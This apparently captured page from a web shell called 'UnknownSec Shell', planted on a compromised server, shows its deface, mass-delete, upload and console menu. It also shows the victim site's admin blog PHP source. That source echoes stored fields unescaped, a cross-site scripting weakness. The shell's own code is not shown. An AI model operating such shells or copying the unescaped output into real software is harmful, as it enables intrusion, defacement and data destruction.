shell bypass 403
UnknownSec Shell
:
/
var
/
www
/
html
/
views
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
v_admin_news.php
<div class='col-10'> <h1>Blog</h1> </div> <div class='col-2 right'> <form action='' method='post'> <input type='submit' name='submitBut' value='Add Post' class='button add_cont_but'> </form> </div> <table class='data_table'> <tr> <th>ID #</th><th>Date</th><th>Title</th><th>Message</th><th class='centre'>Attachment <span class='comment'><br>PDF or Image (png, jpg, gif)</span></th><th>Link</th><th class='centre'>Action</th> </tr> <?php $News = new News; date_default_timezone_set('Canada/Pacific'); $rows = $News->get('', ''); foreach ($rows as $newsID => $row){ $link = ''; if (strlen($row['link']) > 4){ if (strpos($row['link'], 'http') !== true){ $link = 'http://'.$row['link']; } } echo " <tr> <td>".$row['newsID']."</td> <td>".date('M j/y', $row['dateTS'])."</td> <td>".$row['dispTitle']."</td> <td>".$row['message']."</td> <td class='centre'>"; if ($row['attach'] != ''){ if (strpos($row['attach'], '.pdf') > 0){ echo "<a href='views/images/news/".$row['attach']."' target='_blank' style='color: #412f8a'>".$row['attach']."</a>"; } else { echo "<img src='views/images/news/".$row['attach']."'' height=75><br><span style='font-size: x-small'>".$row['attach'] . "</span>"; } } echo "</td> <td>"; if (strlen($row['link']) > 4){ echo "<a href='".$link."' target='_blank' style='color: #412f8a'>".$row['link']."</a>"; } echo " </td> <td class='centre'><form action='' method='post'> <input type='hidden' name='newsID' value='".$row['newsID']."'> <input type='submit' name='submitBut' value='Edit' class='button edit_save_but'> <input type='submit' name='submitBut' value='Delete' class='button del_but'> </form></td> </tr>"; } ?> </table>
© 2026 UnknownSec